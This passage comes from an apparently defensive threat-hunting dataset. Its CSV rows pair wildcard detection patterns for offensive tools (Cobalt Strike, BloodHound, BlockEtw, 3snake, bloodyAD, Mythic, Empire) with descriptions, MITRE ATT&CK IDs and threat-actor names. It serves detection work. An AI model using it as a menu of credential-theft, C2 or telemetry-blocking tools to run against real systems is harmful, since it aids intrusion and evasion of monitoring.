tools,https://github.com/bettercap/bettercap,1,1,N/A,N/A,10,14623,1372,2023-09-18T15:43:34Z,2018-01-07T15:30:41Z -*blendin/3snake*,offensive_tool_keyword,3snake,Tool for extracting information from newly spawned processes,T1003 - T1110 - T1552 - T1505,TA0001 - TA0002 - TA0003,N/A,N/A,Credential Access,https://github.com/blendin/3snake,1,1,N/A,7,7,688,113,2022-02-14T17:42:10Z,2018-02-07T21:03:15Z -*blindSQLPayloads.txt*,offensive_tool_keyword,wapiti,Web vulnerability scanner written in Python3,T1592 - T1592.003,TA0007 - TA0040,N/A,N/A,Web Attacks,https://github.com/wapiti-scanner/wapiti,1,1,N/A,N/A,8,785,132,2023-09-27T07:26:22Z,2020-06-06T20:17:55Z -*blockchain2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*blockdlls -*,offensive_tool_keyword,mythic,A .NET Framework 4.0 Windows Agent,T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Apollo/,1,0,N/A,10,10,401,83,2023-08-17T14:46:04Z,2020-11-09T08:05:16Z -*blockdlls start*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - 
T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*blockdlls stop*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*blocketw.bin*,offensive_tool_keyword,BlockEtw,.Net Assembly to block ETW telemetry in current process,T1055.001 - T1562.001,TA0005,N/A,N/A,Defense 
Evasion,https://github.com/Soledge/BlockEtw,1,1,N/A,10,1,73,20,2020-05-14T19:24:49Z,2020-05-14T02:40:50Z -*blocketw.csproj*,offensive_tool_keyword,BlockEtw,.Net Assembly to block ETW telemetry in current process,T1055.001 - T1562.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/Soledge/BlockEtw,1,1,N/A,10,1,73,20,2020-05-14T19:24:49Z,2020-05-14T02:40:50Z -*blocketw.exe*,offensive_tool_keyword,BlockEtw,.Net Assembly to block ETW telemetry in current process,T1055.001 - T1562.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/Soledge/BlockEtw,1,1,N/A,10,1,73,20,2020-05-14T19:24:49Z,2020-05-14T02:40:50Z -*blocketw.pdb*,offensive_tool_keyword,BlockEtw,.Net Assembly to block ETW telemetry in current process,T1055.001 - T1562.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/Soledge/BlockEtw,1,1,N/A,10,1,73,20,2020-05-14T19:24:49Z,2020-05-14T02:40:50Z -*BlockEtw-master*,offensive_tool_keyword,BlockEtw,.Net Assembly to block ETW telemetry in current process,T1055.001 - T1562.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/Soledge/BlockEtw,1,1,N/A,10,1,73,20,2020-05-14T19:24:49Z,2020-05-14T02:40:50Z -*BlockOpenHandle.cpp*,offensive_tool_keyword,BlockOpenHandle,Block any Process to open HANDLE to your process - only SYTEM is allowed to open handle to your process - with that you can avoid remote memory scanners,T1050.005 - T1480,TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/BlockOpenHandle,1,1,N/A,9,2,149,21,2023-04-27T05:42:51Z,2023-04-27T05:40:47Z -*BlockOpenHandle.exe*,offensive_tool_keyword,BlockOpenHandle,Block any Process to open HANDLE to your process - only SYTEM is allowed to open handle to your process - with that you can avoid remote memory scanners,T1050.005 - T1480,TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/BlockOpenHandle,1,1,N/A,9,2,149,21,2023-04-27T05:42:51Z,2023-04-27T05:40:47Z -*BlockOpenHandle.vcxproj*,offensive_tool_keyword,BlockOpenHandle,Block any Process to open HANDLE to your process - only SYTEM is 
allowed to open handle to your process - with that you can avoid remote memory scanners,T1050.005 - T1480,TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/BlockOpenHandle,1,1,N/A,9,2,149,21,2023-04-27T05:42:51Z,2023-04-27T05:40:47Z -*BlockOpenHandle-main*,offensive_tool_keyword,BlockOpenHandle,Block any Process to open HANDLE to your process - only SYTEM is allowed to open handle to your process - with that you can avoid remote memory scanners,T1050.005 - T1480,TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/BlockOpenHandle,1,1,N/A,9,2,149,21,2023-04-27T05:42:51Z,2023-04-27T05:40:47Z -*bloginuser*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*blogonpasswords*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the 
tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*bloodhound &> /dev/null &*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*bloodhound --no-sandbox*,offensive_tool_keyword,bloodhound,A Python based ingestor for BloodHound,T1057 - T1059 - T1053,TA0003 - TA0008 - TA0009,N/A,N/A,Reconnaissance,https://github.com/fox-it/BloodHound.py,1,0,N/A,10,10,1538,268,2023-09-27T07:56:12Z,2018-02-26T14:44:20Z -*BloodHound-*.zip*,offensive_tool_keyword,BloodHound,BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. 
BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment,T1069 - T1482 - T1018 - T1087 - T1027 - T1046,TA0007 - TA0003 - TA0002 - TA0040 - TA0043,N/A,N/A,Reconnaissance,https://github.com/BloodHoundAD/BloodHound,1,1,N/A,10,10,8799,1624,2023-10-03T06:49:04Z,2016-04-17T18:36:14Z -*bloodhound.ad.*,offensive_tool_keyword,bloodhound,A Python based ingestor for BloodHound,T1057 - T1059 - T1053,TA0003 - TA0008 - TA0009,N/A,N/A,Reconnaissance,https://github.com/fox-it/BloodHound.py,1,1,N/A,10,10,1538,268,2023-09-27T07:56:12Z,2018-02-26T14:44:20Z -*bloodhound.bin*,offensive_tool_keyword,BloodHound,BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. 
Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment,T1069 - T1482 - T1018 - T1087 - T1027 - T1046,TA0007 - TA0003 - TA0002 - TA0040 - TA0043,N/A,N/A,Reconnaissance,https://github.com/BloodHoundAD/BloodHound,1,1,N/A,10,10,8799,1624,2023-10-03T06:49:04Z,2016-04-17T18:36:14Z -*bloodhound.enumeration*,offensive_tool_keyword,bloodhound,A Python based ingestor for BloodHound,T1057 - T1059 - T1053,TA0003 - TA0008 - TA0009,N/A,N/A,Reconnaissance,https://github.com/fox-it/BloodHound.py,1,1,N/A,10,10,1538,268,2023-09-27T07:56:12Z,2018-02-26T14:44:20Z -*BloodHound.ps1*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - 
Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Get-SPN.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*bloodhound.py *,offensive_tool_keyword,BloodHound.py,BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment,T1069,TA0007,N/A,N/A,Exploitation tools,https://github.com/fox-it/BloodHound.py,1,0,N/A,10,10,1538,268,2023-09-27T07:56:12Z,2018-02-26T14:44:20Z -*bloodhound.py*,offensive_tool_keyword,bloodhound,A Python based ingestor for BloodHound,T1057 - T1059 - T1053,TA0003 - TA0008 - TA0009,N/A,N/A,Reconnaissance,https://github.com/fox-it/BloodHound.py,1,1,N/A,10,10,1538,268,2023-09-27T07:56:12Z,2018-02-26T14:44:20Z -*bloodhound.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*bloodhound_output*/dev/null*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*bloodhound_output_*.txt*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*bloodhound_output_dconly_*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*BloodHoundAD*,offensive_tool_keyword,BloodHound,BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. 
Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment,T1069 - T1482 - T1018 - T1087 - T1027 - T1046,TA0007 - TA0003 - TA0002 - TA0040 - TA0043,N/A,N/A,Reconnaissance,https://github.com/BloodHoundAD/BloodHound,1,1,N/A,10,10,8799,1624,2023-10-03T06:49:04Z,2016-04-17T18:36:14Z -*BloodHoundAD*,offensive_tool_keyword,sharphound,C# Data Collector for BloodHound,T1057 - T1059 - T1053,TA0003 - TA0008 - TA0009,N/A,N/A,Reconnaissance,https://github.com/BloodHoundAD/SharpHound,1,1,N/A,N/A,5,440,124,2023-09-28T19:43:14Z,2021-07-12T17:07:04Z -*BloodHoundGraphToGoFetchPath*,offensive_tool_keyword,GoFetch,GoFetch is a tool to automatically exercise an attack plan generated by the BloodHound application.,T1078 - T1078.003 - T1021 - T1021.006 - T1076.001,TA0005 - TA0001 - TA0003,N/A,N/A,Exploitation tools - AD Enumeration,https://github.com/GoFetchAD/GoFetch,1,0,N/A,10,7,615,126,2017-06-20T14:15:10Z,2017-04-11T10:45:23Z -*bloodhound-import -du neo4j -dp *.json*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*BloodHound-master*,offensive_tool_keyword,bloodhound,A Python based ingestor for BloodHound,T1057 - T1059 - T1053,TA0003 - TA0008 - TA0009,N/A,N/A,Reconnaissance,https://github.com/fox-it/BloodHound.py,1,1,N/A,10,10,1538,268,2023-09-27T07:56:12Z,2018-02-26T14:44:20Z -*BloodHound-modified.ps1*,offensive_tool_keyword,crackmapexec,A swiss army knife for pentesting networks,T1210 
T1570 T1021 T1595 T1592 T1589 T1590 ,N/A,N/A,N/A,POST Exploitation tools,https://github.com/byt3bl33d3r/CrackMapExec,1,1,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*bloodhound-python*,offensive_tool_keyword,bloodhound,BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment,T1069,TA0007,N/A,N/A,Frameworks,https://github.com/fox-it/BloodHound.py,1,1,N/A,10,10,1538,268,2023-09-27T07:56:12Z,2018-02-26T14:44:20Z -*bloodhound-quickwin -u * -p *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*bloodhound-quickwin-main*,offensive_tool_keyword,bloodhound-quickwin,Simple script to extract useful informations from the combo BloodHound + Neo4j,T1087 - T1087.001 - T1018 - T1069 - T1069.002,TA0007 - TA0003 - TA0004,N/A,N/A,AD Enumeration,https://github.com/kaluche/bloodhound-quickwin,1,1,N/A,6,2,162,17,2023-07-17T14:31:51Z,2021-02-16T16:04:16Z -*bloodyAD -*,offensive_tool_keyword,bloodyAD,BloodyAD is an Active Directory Privilege Escalation Framework,T1078.004 - T1059.003 - T1071.001,TA0004 - TA0002,N/A,N/A,Privilege 
Escalation,https://github.com/CravateRouge/bloodyAD,1,0,N/A,10,9,883,96,2023-09-01T09:12:45Z,2021-10-11T15:07:26Z -*bloodyAD.py*,offensive_tool_keyword,bloodyAD,BloodyAD is an Active Directory Privilege Escalation Framework,T1078.004 - T1059.003 - T1071.001,TA0004 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/CravateRouge/bloodyAD,1,1,N/A,10,9,883,96,2023-09-01T09:12:45Z,2021-10-11T15:07:26Z -*bloodyAD-main*,offensive_tool_keyword,bloodyAD,BloodyAD is an Active Directory Privilege Escalation Framework,T1078.004 - T1059.003 - T1071.001,TA0004 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/CravateRouge/bloodyAD,1,1,N/A,10,9,883,96,2023-09-01T09:12:45Z,2021-10-11T15:07:26Z -*bluekeepscanner.exe*,offensive_tool_keyword,pingcastle,active directory weakness scan Vulnerability scanner and Earth Lusca Operations Tools and commands,T1087 - T1012 - T1064 - T1210 - T1213 - T1566 - T1071,TA0006 - TA0008 - TA0009 - TA0011,N/A,N/A,Exploitation tools,https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/vletoux/pingcastle,1,1,N/A,N/A,,N/A,,, -*bm90cmVkYW1lY2hlYXRzdG93aW4-*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,0,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*bniikohfmajhdcffljgfeiklcbgffppl*,greyware_tool_keyword,Upnet,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data 
Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*bnijmipndnicefcdbhgcjoognndbgkep*,greyware_tool_keyword,Veee,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*bob@moozle.wtf*,offensive_tool_keyword,FudgeC2,FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.,T1021.002 - T1105 - T1059.001 - T1059.003,TA0008 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/Ziconius/FudgeC2,1,1,N/A,10,10,237,54,2023-05-01T21:13:56Z,2018-09-09T21:05:21Z -*BOF prototype works!*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Beacon Object File (BOF) that uses handwritten shellcode to return the process Environment strings without touching any DLL's.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - 
Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/boku7/whereami,1,0,N/A,10,10,152,27,2023-03-13T15:56:38Z,2021-08-19T22:32:34Z -*bof*/CredEnum/*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/guervild/BOFs,1,1,N/A,10,10,153,27,2022-05-02T16:59:24Z,2021-03-15T23:30:22Z -*BOF.NET.git*,offensive_tool_keyword,BOF.NET,A .NET Runtime for Cobalt Strike's Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - 
T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/CCob/BOF.NET,1,0,N/A,10,10,557,86,2023-08-13T13:24:00Z,2020-11-02T20:02:55Z -*BOF.NET-main*,offensive_tool_keyword,BOF.NET,A .NET Runtime for Cobalt Strike's Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 